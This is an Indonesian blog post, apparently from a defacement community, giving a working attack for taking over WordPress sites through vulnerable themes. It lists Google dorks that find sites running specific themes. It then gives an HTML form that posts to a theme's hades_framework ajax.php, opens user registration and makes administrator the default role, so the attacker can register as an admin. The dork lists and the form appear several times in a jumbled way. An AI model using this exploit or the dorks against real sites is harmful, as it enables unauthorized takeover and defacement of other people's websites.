 |
| Wordpress Add Admin Vulnerability |
Mr.X98
Dork :
inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/GantiDengantema/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/themanya/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
•dan masih banyak lagi tema Vuln lainnya Baca Selengkapnya :
http://www.mas-tah.com/2017/08/deface-dengan-teknik-add-admin-wp.html
inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/GantiDengantema/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/themanya/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/GantiDengantema/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/themanya/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
Dan masih banyak lagi tema yang vuln...
CSRF :
<form action="localhost/wp-content/themes/nama tema/hades_framework/option_panel/ajax.php" method="POST">
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="email lu yang aktiv">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form>
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="email lu yang aktiv">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form>
Kalo muncul notif succes berarti vuln tinggal register menggunakan email tadi
localhost/wp-login.php?action=register
Sekian...
inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/GantiDengantema/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/themanya/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
•dan masih banyak lagi tema Vuln lainnya Baca Selengkapnya :
http://www.mas-tah.com/2017/08/deface-dengan-teknik-add-admin-wp.html
0 Komentar
Berkomentarlah dengan bijak